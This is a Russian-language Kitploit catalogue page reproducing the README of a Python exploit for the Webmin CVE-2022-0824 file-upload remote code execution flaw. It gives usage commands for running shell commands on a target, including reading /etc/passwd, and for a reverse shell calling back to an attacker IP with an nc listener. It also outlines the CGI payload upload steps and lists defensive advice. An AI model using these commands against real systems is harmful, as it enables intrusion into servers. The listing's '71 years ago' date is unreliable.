Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/nudttan91/webmin-cve-2022-0824-enhanced-exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного ДоступаГенерация Шеллкода
GitHubnudttan91/webmin-cve-2022-0824-enhanced-exploit

Webmin-CVE-2022-0824-Enhanced-Exploit

Python-эксплойт для Webmin CVE-2022-0824 с поддержкой двух режимов: непосредственное выполнение команд и reverse shell. Включает несколько типов полезной нагрузки, интеллектуальное управление файлами и подробное логирование отладки для авторизованного тестирования безопасности.

Репозиторий
71 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Webmin-CVE-2022-0824-Enhanced-Exploit

[!IMPORTANT]

Webmin CVE-2022-0824 — улучшенный эксплойт-инструмент с поддержкой двух режимов: выполнение команд и reverse shell

Python Version License CVE

[!IMPORTANT]

Улучшенный эксплойт для уязвимости Webmin CVE-2022-0824 с поддержкой двух режимов: прямое выполнение команд и reverse shell.

🚀 Возможности

  • ✅ Поддержка двух режимов: режим выполнения команд + режим reverse shell
  • ✅ Различные Payload'ы: три разных payload: Perl, Bash, Python
  • ✅ Умное управление файлами: автоматическая генерация уникальных имён файлов, позволяющая избежать конфликтов
  • ✅ Принудительная перезапись при загрузке: автоматическая обработка перезаписи уже существующих файлов
  • ✅ Несколько способов загрузки: загрузка по HTTP, прямая загрузка, создание через выполнение команд
  • ✅ Подробная отладочная информация: полное логирование процесса выполнения
  • ✅ Дружественный интерфейс: цветной вывод и понятные статусные уведомления

📋 Информация об уязвимости

  • Идентификатор CVE: CVE-2022-0824
  • Затронутые версии: Webmin < 1.990
  • Тип уязвимости: удалённое выполнение кода из-за произвольной загрузки файлов
  • Оценка CVSS: 9.8 (Critical)

🛠️ Требования к установке

root@kitploit:~
# Python 3.6+
pip3 install requests urllib3

📖 Использование

Режим выполнения команд (рекомендуется)

root@kitploit:~
# 基本命令执行
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "whoami"

# 查看系统信息
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "uname -a"

# 列出文件
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "ls -la /etc"

# 查看敏感文件
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "cat /etc/passwd"

# 网络信息
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 --shell "netstat -tulnp"

Режим reverse shell

root@kitploit:~
# 1. 启动监听器
nc -nlvp 9999

# 2. 执行漏洞利用
python3 exploit.py -t http://target:10000/ -c admin:password -LS attacker_ip:8080 -L attacker_ip -P 9999

📝 Описание параметров

ПараметрОписаниеОбязателенПример
-t, --targetЦелевой URL Webmin✅http://192.168.1.100:10000/
-c, --credentialУчётные данные для входа✅admin:password
-LS, --py3http_serverАдрес HTTP-сервера✅192.168.1.50:8080
--shellКоманда для выполнения❌"ls -la"
-L, --callback_ipIP для обратного подключения reverse shell❌*192.168.1.50
-P, --callback_portПорт для обратного подключения reverse shell❌*9999

*Примечание: обязателен в режиме reverse shell

🎯 Примеры использования

Пример 1: сбор информации о системе

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "whoami && id && pwd"

Пример 2: исследование файловой системы

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "find /home -name '*.txt' 2>/dev/null"

Пример 3: просмотр конфигурации сети

root@kitploit:~
python3 exploit.py -t http://192.168.1.100:10000/ -c root:password -LS 192.168.1.50:8080 --shell "ip addr show && route -n"

🔧 Принцип работы

  1. Проверка подлинности: вход в интерфейс управления Webmin с использованием предоставленных учётных данных
  2. Генерация Payload: создание соответствующего CGI-скрипта в зависимости от режима
  3. Загрузка файла: загрузка payload через функцию HTTP-загрузки файлового менеджера
  4. Настройка прав: установка прав на выполнение для загруженного файла
  5. Выполнение команды: обращение к загруженному CGI-скрипту для выполнения команды или установки обратного соединения

🛡️ Рекомендации по защите

  • Своевременно обновляйте Webmin до последней версии (>= 1.990)
  • Ограничьте сетевой доступ к интерфейсу управления Webmin
  • Используйте надёжные пароли и двухфакторную аутентификацию
  • Регулярно проверяйте системные журналы
  • Разверните межсетевой экран для веб-приложений (WAF)

⚠️ Отказ от ответственности

Данный инструмент предназначен только для авторизованного тестирования безопасности и образовательных целей.

  • 🚫 Запрещено использование против неавторизованных систем
  • 🚫 Запрещено использование для вредоносных атак
  • 🚫 Пользователь несёт соответствующую юридическую ответственность
  • ✅ Используйте только в средах с явно выданным разрешением
  • ✅ Для исследований в области безопасности и проверки уязвимостей

📚 Технические детали

Типы Payload

  • Perl CGI: основной payload, наилучшая совместимость
  • Bash CGI: запасной payload, подходит для Linux-систем
  • Python CGI: запасной payload, наиболее функциональный

Способы загрузки

  1. Загрузка по HTTP: через функцию удалённой загрузки файлового менеджера Webmin
  2. Прямая загрузка: через интерфейс загрузки файлов
  3. Создание командой: создание файла с помощью системной команды

Стратегия именования файлов

  • MD5-хеш на основе содержимого команды
  • Суффикс с временной меткой
  • Обеспечивает использование уникального имени файла при каждом выполнении

🔄 Журнал обновлений

v5.0 (2025-08-05)

  • ✨ Добавлен режим выполнения команд
  • 🐛 Исправлена проблема перезаписи файлов
  • 🔧 Улучшена стратегия именования файлов
  • 📈 Улучшена обработка ошибок

v4.0 (на основе оригинала)

  • 🎯 На основе оригинального кода faisalfs10x
  • 🔧 Улучшена совместимость с CGI
  • 📝 Добавлены подробные журналы

🤝 Вклад

Приветствуются Issue и Pull Request!

  1. Форкните этот проект
  2. Создайте ветку для новой функции (git checkout -b feature/AmazingFeature)
  3. Зафиксируйте изменения (git commit -m 'Add some AmazingFeature')
  4. Отправьте в ветку (git push origin feature/AmazingFeature)
  5. Откройте Pull Request

📄 Лицензия

Этот проект распространяется под лицензией MIT — подробнее см. в файле LICENSE

🙏 Благодарности

  • Автор оригинального кода: @faisalfs10x
  • Оригинальный проект: Webmin-CVE-2022-0824-revshell
  • Обнаружившие CVE: соответствующие исследователи безопасности

📞 Контакты

Если у вас есть вопросы или предложения, свяжитесь с нами следующим образом:

  • 📧 Отправьте GitHub Issue
  • 🐛 О проблемах безопасности сообщайте в личные сообщения

⭐ Если этот проект оказался вам полезен, поставьте Star в знак поддержки!

🔗 Связанные ссылки

  • Подробнее о CVE-2022-0824
  • Официальный сайт Webmin
  • Оригинальный проект

requirements.txt

root@kitploit:~
requests>=2.25.1
urllib3>=1.26.0
Скачать инструмент